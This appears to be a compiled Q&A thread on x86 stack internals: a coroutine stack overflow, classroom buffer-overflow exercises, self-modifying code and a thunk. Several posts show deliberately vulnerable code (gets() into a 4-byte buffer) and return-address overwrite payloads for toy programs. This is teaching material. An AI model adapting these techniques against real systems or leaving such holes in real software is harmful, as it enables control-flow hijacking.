I'am doing an exercice for an Operational Systems class and getting an SegFault error when calling printf with arguments.
The objective of the exercice is to simulate the initialization of a thread and print a counter, not very difficult. I have a table of 4 entries each with size 4096 bytes, each entry must represent the thread's stack represented as
#define STACK_SIZE 4096
char table[4][STACK_SIZE];
I defined a type called coroutine that will get only a stack address
typedef void* coroutine_t;
The i have a initialization code. This code must take the end of the routine stack, append the address of the coroutine and the initialization of the registers and return the pointer that will be the stack pointer for the coroutine.
coroutine_t init_coroutine(void *stack_begin, unsigned int stack_size,
void (*initial_pc)(void)) {
char *stack_end = ((char *)stack_begin) + stack_size;
void **ptr = (void**) stack_end;
ptr--;
*ptr = initial_pc;
ptr--;
*ptr = stack_end; /* Frame pointer */
ptr--;
*ptr = 0; /* RBX*/
ptr--;
*ptr = 0; /* R12 */
ptr--;
*ptr = 0; /* R13 */
ptr--;
*ptr = 0; /* R14 */
ptr--;
*ptr = 0; /* R15 */
return ptr;
}
Then i have this code in x86 assembly to enter the coroutine that just pop the register previously pushed
.global enter_coroutine /* Makes enter_coroutine visible to the linker*/
enter_coroutine:
mov %rdi,%rsp /* RDI contains the argument to enter_coroutine. */
/* And is copied to RSP. */
pop %r15
pop %r14
pop %r13
pop %r12
pop %rbx
pop %rbp
ret /* Pop the program counter */
The rest of my code is this
coroutine_t cr;
void test_function() {
int counter = 0;
while(1) {
printf("counter1: %d\n", counter);
counter++;
}
}
int main() {
cr = init_coroutine(table[0], STACK_SIZE, &test_function);
enter_coroutine(cr);
return 0;
}
So for the error
If i run as it is i will get a segfault when the program call printf the output from gdb is
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7dfcfdd in __vfprintf_internal (s=0x7ffff7f9d760 <_IO_2_1_stdout_>, format=0x555555556004 "counter1: %d\n", ap=ap#entry=0x555555558f48 <table+3848>, mode_flags=mode_flags#entry=0) at vfprintf-internal.c:1385
I assume it has some thing happening with the stack for two causes:
If i just print a string without parameters i get no error
If i remove the first ptr-- statement from the init_coroutine function it will also work, but will alocate things in the end of the stack and hence in the other thread's stack
I'am running this in a Intel(R) Core(TM) i5-5200U CPU with ubuntu 21.10 and ggc version 11.2.0
Could you give me some light here ?
I wasn't able to reproduce the problem on my x86_64 Linux box, but I was on compiler explorer, and the problem seems to be simple stack overflow (i.e., 4096 is too small a stack for printf).
Increasing the stack size (or choosing table[1], table[2], or table[3] instead table[0], which is effectively the same as increasing stack size) appears to make it work: https://gcc.godbolt.org/z/rnfMThbjo
Related
I am trying to learn more about buffer overflows so I have created a simple program to gain knowledge and try to exploit it.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void failed(void)
{
puts("Did not exploit");
exit(0);
}
void pass(void)
{
puts("Good Job");
exit(1);
}
void foo()
{
char input[4];
gets(input);
}
int _main()
{
foo();
failed();
return 0;
}
I am trying to fill the buffer within foo() with random characters as well as the address of pass() such that the return address of foo() gets overwritten to the starting address of pass(). Using the GDB commands as follows to get relevant information.
x foo
-> 0x8049dd7 foo : 0xfb1e0ff3
disas foo
Dump of assembler code for function foo:
0x08049e09 <+0>: endbr32
0x08049e0d <+4>: push %ebp
0x08049e0e <+5>: mov %esp,%ebp
0x08049e10 <+7>: push %ebx
0x08049e11 <+8>: sub $0x14,%esp
0x08049e14 <+11>: call 0x8049e5a <__x86.get_pc_thunk.ax>
0x08049e19 <+16>: add $0x9b1e7,%eax
0x08049e1e <+21>: sub $0xc,%esp
0x08049e21 <+24>: lea -0xc(%ebp),%edx
0x08049e24 <+27>: push %edx
0x08049e25 <+28>: mov %eax,%ebx
0x08049e27 <+30>: call 0x8058850 <gets>
0x08049e2c <+35>: add $0x10,%esp
0x08049e2f <+38>: nop
0x08049e30 <+39>: mov -0x4(%ebp),%ebx
0x08049e33 <+42>: leave
0x08049e34 <+43>: ret
End of assembler dump.
I then created a python program which feeds its output into my vulnerable.c program as printing simply
print('A'*15 + '\x08\x04\x9d\xd7')
The A*15 is supposed to fill the buffer and the EBP then overwrites the return address with the address of foo (\x08\x04\x9d\xd7) but I continue to get segmentation faults. Any assistance would be great!
Any mistake and the attempt will segfault. You must:
have the right target address
put it in the right place on the stack
use the right byte order
The first one is difficult because the kernel will randomize address spaces on load,
primarily because of these kinds of attacks.
The other two you've gotten wrong.
If you'd like to play with something similar, here's an example
that changes the return address. Because of C calling conventions,
the stack is corrupted at the end of main, which can be fixed by using
stdcall or pascal calling conventions for the test function.
Syntax for that is compiler dependent.
#include <stdio.h>
#include <stdlib.h>
void oops() {
printf("oops!\n");
}
void /*__stdcall*/ test(int t)
{
/* x86 stack is top down, int is same size as pointer */
int *return_is_at = &t - 1;
/* replace parameter with our return address, for oops to return to */
*(&t) = *return_is_at; /* just-in-case avoid optimization*/
/* replace our return address with address of oops */
*return_is_at = (int)oops;
}
int main(int argc, char **argv)
{
test(1);
printf("test returned\n");
/* unless stdcall, at this point our stack is corrupted
and this return will crash, so:
*/
exit(1);
}
Here's an alternative function that uses a local variable to calculate
the return address location intead of the parameter.
This assumes a standard stack frame, which the compiler may optimize away.
It also corrupts the stack.
void test2()
{
/* x86 stack is top down, int is same size as pointer */
/* this relies on consistently defined stack frames */
int l;
int *return_is_at = &l + 2;
/* copy our return address up one,
for oops to return to (corrupting the stack)
*/
return_is_at[1] = *return_is_at;
/* replace our return address with address of oops */
*return_is_at = (int)oops;
}
FYI - It's possible to use a similar technique to track unique call trees for a function
(by walking up the stack frames) in order to fail specific call instances during testing.
I am trying to do a buffer-overflow for my security class, we are not allowed to call any function and we need to jump to secret function and also return 0 without segmentation fault. I wrote the code below and successfully jumped to secret but I am getting a segmentation fault. How can I terminate the program successfully? Or is it possible to just write to a single address instead of for loop, when I tried it did not change anything.
#include <stdio.h>
void secret()
{
printf("now inside secret()!\n");
}
void entrance()
{
int doNotTouch[10];
// can only modify this section BEGIN
// cant call secret(), maybe use secret (pointer to function)
for (int i = 0; i < 14; i++) {
*(doNotTouch + i) = (int) &secret;
}
// can only modify this section END
printf("now inside entrance()!\n");
}
int main (int argc, char *argv[])
{
entrance();
return 0;
}
In some semi-assembler, assuming some kind of x86. (BP is pseudocode for EBP or RBP, assuming you're not actually compiling for 16-bit mode. 32-bit mode is likely so int is the same width as a return address.)
; entrance:
; - stack has return address to main
push bp ; decrement SP by a pointer width
mov bp,sp
sub sp, 10*sizeof(int) ; reserve space for an array
;....
; doNotTouch[0] is probably at [bp - 10*sizeof(int)]
When you loop to 14, you first overwrite the saved bp at i==10 and then the return address to main (which is correct) and then overwrite some more which eventually causes the seg fault. So you only need to do *(doNotTouch + 11) = (int) &secret; - assuming int is the size of a function pointer. (Or a bit more if the compiler left a gap for stack-alignment or its own use. In a debug build other locals will have stack slots. Overwriting them could lead to an infinite loop that goes out of bounds.)
Then follows your printf and then the function returns, but it does not return to main but "jumps" to secret.
When secret returns, it is actually now the return from main but it couldn't do the return 0;
So secret should be:
int secret()
{
printf("now inside secret()!\n");
return 0;
}
Disclaimer: "....I think."
A lot of related questions <How is x86 instruction cache synchronized? > mention x86 should properly handle i-cache synchronization in self modifying code. I wrote the following piece of code which toggles a function call on and off from different threads interleaved with its execution. I am using compare and swap operation as an additional guard so that the modification is atomic. But I am getting intermittent crashes (SIGSEGV, SIGILL) and analyzing the core dump makes me suspicious if the processor is trying to execute partially updated instructions. The code and the analysis given below. May be I am missing something here. Let me know if that's the case.
toggle.c
#include <stdio.h>
#include <inttypes.h>
#include <time.h>
#include <pthread.h>
#include <sys/mman.h>
#include <errno.h>
#include <unistd.h>
int active = 1; // Whether the function is toggled on or off
uint8_t* funcAddr = 0; // Address where function call happens which we need to toggle on/off
uint64_t activeSequence = 0; // Byte sequence for toggling on the function CALL
uint64_t deactiveSequence = 0; // NOP byte sequence for toggling off the function CALL
inline int modify_page_permissions(uint8_t* addr) {
long page_size = sysconf(_SC_PAGESIZE);
int code = mprotect((void*)(addr - (((uint64_t)addr)%page_size)), page_size,
PROT_READ | PROT_WRITE | PROT_EXEC);
if (code) {
fprintf(stderr, "mprotect was not successfull! code %d\n", code);
fprintf(stderr, "errno value is : %d\n", errno);
return 0;
}
// If the 8 bytes we need to modify straddles a page boundary make the next page writable too
if (page_size - ((uint64_t)addr)%page_size < 8) {
code = mprotect((void*)(addr-((uint64_t)addr)%page_size+ page_size) , page_size,
PROT_READ | PROT_WRITE | PROT_EXEC);
if (code) {
fprintf(stderr, "mprotect was not successfull! code %d\n", code);
fprintf(stderr, "errno value is : %d\n", errno);
return 0;;
}
}
return 1;
}
void* add_call(void* param) {
struct timespec ts;
ts.tv_sec = 0;
ts.tv_nsec = 50000;
while (1) {
if (!active) {
if (activeSequence != 0) {
int status = modify_page_permissions(funcAddr);
if (!status) {
return 0;
}
uint8_t* start_addr = funcAddr - 8;
fprintf(stderr, "Activating foo..\n");
uint64_t res = __sync_val_compare_and_swap((uint64_t*) start_addr,
*((uint64_t*)start_addr), activeSequence);
active = 1;
} else {
fprintf(stderr, "Active sequence not initialized..\n");
}
}
nanosleep(&ts, NULL);
}
}
int remove_call(uint8_t* addr) {
if (active) {
// Remove gets called first before add so we initialize active and deactive state byte sequences during the first call the remove
if (deactiveSequence == 0) {
uint64_t sequence = *((uint64_t*)(addr-8));
uint64_t mask = 0x0000000000FFFFFF;
uint64_t deactive = (uint64_t) (sequence & mask);
mask = 0x9090909090000000; // We NOP 5 bytes of CALL instruction and leave rest of the 3 bytes as it is
activeSequence = sequence;
deactiveSequence = deactive | mask;
funcAddr = addr;
}
int status = modify_page_permissions(addr);
if (!status) {
return -1;
}
uint8_t* start_addr = addr - 8;
fprintf(stderr, "Deactivating foo..\n");
uint64_t res = __sync_val_compare_and_swap((uint64_t*)start_addr,
*((uint64_t*)start_addr), deactiveSequence);
active = 0;
// fprintf(stderr, "Result : %p\n", res);
}
}
int counter = 0;
void foo(int i) {
// Use the return address to determine where we need to patch foo CALL instruction (5 bytes)
uint64_t* addr = (uint64_t*)__builtin_extract_return_addr(__builtin_return_address(0));
fprintf(stderr, "Foo counter : %d\n", counter++);
remove_call((uint8_t*)addr);
}
// This thread periodically checks if the method is inactive and if so reactivates it
void spawn_add_call_thread() {
pthread_t tid;
pthread_create(&tid, NULL, add_call, (void*)NULL);
}
int main() {
spawn_add_call_thread();
int i=0;
for (i=0; i<1000000; i++) {
// fprintf(stderr, "i : %d..\n", i);
foo(i);
}
fprintf(stderr, "Final count : %d..\n\n\n", counter);
}
Core dump analysis
Program terminated with signal 4, Illegal instruction.
#0 0x0000000000400a28 in main () at toggle.c:123
(gdb) info frame
Stack level 0, frame at 0x7fff7c8ee360:
rip = 0x400a28 in main (toggle.c:123); saved rip 0x310521ed5d
source language c.
Arglist at 0x7fff7c8ee350, args:
Locals at 0x7fff7c8ee350, Previous frame's sp is 0x7fff7c8ee360
Saved registers:
rbp at 0x7fff7c8ee350, rip at 0x7fff7c8ee358
(gdb) disas /r 0x400a28,+30
Dump of assembler code from 0x400a28 to 0x400a46:
=> 0x0000000000400a28 <main+64>: ff (bad)
0x0000000000400a29 <main+65>: ff (bad)
0x0000000000400a2a <main+66>: ff eb ljmpq *<internal disassembler error>
0x0000000000400a2c <main+68>: e7 48 out %eax,$0x48
(gdb) disas /r main
Dump of assembler code for function main:
0x00000000004009e8 <+0>: 55 push %rbp
...
0x0000000000400a24 <+60>: 89 c7 mov %eax,%edi
0x0000000000400a26 <+62>: e8 11 ff ff ff callq 0x40093c <foo>
0x0000000000400a2b <+67>: eb e7 jmp 0x400a14 <main+44>
So as can be seen the instruction pointer seems to positioned within an address inside the CALL instruction and processor is apparently trying to execute that misaligned instruction causing an illegal instruction fault.
I think your problem is that you replaced a 5-byte CALL instruction with 5 1-byte NOPs. Consider what happens when your thread has executed 3 of the NOPs, and then your master thread decides to swap the CALL instruction back in. Your thread's PC will be three bytes in the middle of the CALL instruction and will therefore execute an unexpected and likely illegal instruction.
What you need to do is swap the 5-byte CALL instruction with a 5-byte NOP. You just need to find a multibyte instruction that does nothing (such as or'ing a register against itself) and if you need some extra bytes, prepend some prefix bytes such as a gs override prefix and an address-size override prefix (both of which will do nothing). By using a 5-byte NOP, your thread will be guaranteed to either be at the CALL instruction or past the CALL instruction, but never inside of it.
On 80x86 most calls use a relative displacement, not an absolute address. Essentially its "call the code at here + < displacement >" and not "call the code at < address >".
For 64-bit code, the displacement may be 8 bits or 32-bits. It's never 64-bits.
For example, for a 2-byte "call with 8-bit displacement" instruction, you'd be trashing 6 bytes before the call instruction, the call opcode itself, and the instruction's operand (the displacement).
For another example, for a 5-byte "call with 32-bit displacement" instruction, you'd be trashing 3 bytes before the call instruction, the call opcode itself, and the instruction's operand (the displacement).
However...
These aren't the only way to call. For example, you can call using a function pointer, where the address of the code being called is not in the instruction at all (but may be in a register or be a variable in memory). There's also an optimisation called "tail call optimisation" where a call followed by a ret is replaced with a jmp (likely with some additional stack diddling for passing parameters, cleaning up the caller's local variables, etc).
Essentially; your code is severely broken, you can't cover all the possible corner cases, you shouldn't be doing this to begin with, and you probably should be using a function pointer instead of self modifying code (which would be faster and easier and portable too).
I want to skip a line in C, the line x=1; in the main section using bufferoverflow; however, I don't know why I can not skip the address from 4002f4 to the next address 4002fb in spite of the fact that I am counting 7 bytes form <main+35> to <main+42>.
I also have configured the options the randomniZation and execstack environment in a Debian and AMD environment, but I am still getting x=1;. What it's wrong with this procedure?
I have used dba to debug the stack and the memory addresses:
0x00000000004002ef <main+30>: callq 0x4002a4 **<function>**
**0x00000000004002f4** <main+35>: movl $0x1,-0x4(%rbp)
**0x00000000004002fb** <main+42>: mov -0x4(%rbp),%esi
0x00000000004002fe <main+45>: mov $0x4629c4,%edi
void function(int a, int b, int c)
{
char buffer[5];
int *ret;
ret = buffer + 12;
(*ret) += 8;
}
int main()
{
int x = 0;
function(1, 2, 3);
x = 1;
printf("x = %i \n", x);
return 0;
}
You must be reading Smashing the Stack for Fun and Profit article. I was reading the same article and have found the same problem it wasnt skipping that instruction. After a few hours debug session in IDA I have changed the code like below and it is printing x=0 and b=5.
#include <stdio.h>
void function(int a, int b) {
int c=0;
int* pointer;
pointer =&c+2;
(*pointer)+=8;
}
void main() {
int x =0;
function(1,2);
x = 3;
int b =5;
printf("x=%d\n, b=%d\n",x,b);
getch();
}
In order to alter the return address within function() to skip over the x = 1 in main(), you need two pieces of information.
1. The location of the return address in the stack frame.
I used gdb to determine this value. I set a breakpoint at function() (break function), execute the code up to the breakpoint (run), retrieve the location in memory of the current stack frame (p $rbp or info reg), and then retrieve the location in memory of buffer (p &buffer). Using the retrieved values, the location of the return address can be determined.
(compiled w/ GCC -g flag to include debug symbols and executed in a 64-bit environment)
(gdb) break function
...
(gdb) run
...
(gdb) p $rbp
$1 = (void *) 0x7fffffffe270
(gdb) p &buffer
$2 = (char (*)[5]) 0x7fffffffe260
(gdb) quit
(frame pointer address + size of word) - buffer address = number of bytes from local buffer variable to return address
(0x7fffffffe270 + 8) - 0x7fffffffe260 = 24
If you are having difficulties understanding how the call stack works, reading the call stack and function prologue Wikipedia articles may help. This shows the difficulty in making "buffer overflow" examples in C. The offset of 24 from buffer assumes a certain padding style and compile options. GCC will happily insert stack canaries nowadays unless you tell it not to.
2. The number of bytes to add to the return address to skip over x = 1.
In your case the saved instruction pointer will point to 0x00000000004002f4 (<main+35>), the first instruction after function returns. To skip the assignment you need to make the saved instruction pointer point to 0x00000000004002fb (<main+42>).
Your calculation that this is 7 bytes is correct (0x4002fb - 0x4002fb = 7).
I used gdb to disassemble the application (disas main) and verified the calculation for my case as well. This value is best resolved manually by inspecting the disassembly.
Note that I used a Ubuntu 10.10 64-bit environment to test the following code.
#include <stdio.h>
void function(int a, int b, int c)
{
char buffer[5];
int *ret;
ret = (int *)(buffer + 24);
(*ret) += 7;
}
int main()
{
int x = 0;
function(1, 2, 3);
x = 1;
printf("x = %i \n", x);
return 0;
}
output
x = 0
This is really just altering the return address of function() rather than an actual buffer overflow. In an actual buffer overflow, you would be overflowing buffer[5] to overwrite the return address. However, most modern implementations use techniques such as stack canaries to protect against this.
What you're doing here doesn't seem to have much todo with a classic bufferoverflow attack. The whole idea of a bufferoverflow attack is to modify the return adress of 'function'. Disassembling your program will show you where the ret instruction (assuming x86) takes its adress from. This is what you need to modify to point at main+42.
I assume you want to explicitly provoke the bufferoverflow here, normally you'd need to provoke it by manipulating the inputs of 'function'.
By just declaring a buffer[5] you're moving the stackpointer in the wrong direction (verify this by looking at the generated assembly), the return adress is somewhere deeper inside in the stack (it was put there by the call instruction). In x86 stacks grow downwards, that is towards lower adresses.
I'd approach this by declaring an int* and moving it upward until I'm at the specified adress where the return adress has been pushed, then modify that value to point at main+42 and let function ret.
You can't do that this way.
Here's a classic bufferoverflow code sample. See what happens once you feed it with 5 and then 6 characters from your keyboard. If you go for more (16 chars should do) you'll overwrite base pointer, then function return address and you'll get segmentation fault. What you want to do is to figure out which 4 chars overwrite the return addr. and make the program execute your code. Google around linux stack, memory structure.
void ff(){
int a=0; char b[5];
scanf("%s",b);
printf("b:%x a:%x\n" ,b ,&a);
printf("b:'%s' a:%d\n" ,b ,a);
}
int main() {
ff();
return 0;
}
void foo(int a)
{ printf ("In foo, a = %d\n", a); }
unsigned char code[9];
* ((DWORD *) &code[0]) = 0x042444FF; /* inc dword ptr [esp+4] */
code[4] = 0xe9; /* JMP */
* ((DWORD *) &code[5]) = (DWORD) &foo - (DWORD) &code[0] - 9;
void (*pf)(int/* a*/) = (void (*)(int)) &code[0];
pf (6);
Anyone knows where in the above code 6 is incremented by 1?
foo(), as well as your thunk, uses the __cdecl calling conversion, which requires the caller to push parameters on the stack. So when pf(6) is called, 6 gets pushed onto the stack via a PUSH 6 instruction, and then the thunk is entered via a CALL pf instruction. The memory that 6 occupies on the stack is located at ESP+4 when the thunk is entered, ie 4 bytes from the current value of the stack pointer register ESP. The first instruction of the thunk is to increment the value that is pointed to by ESP+4, thus the value '6' is incremented to '7'. foo() is then entered by the thunk's JMP foo instruction. foo() then sees its a parameter as 7 instead of the original 6 because the thunk modified foo()'s call stack.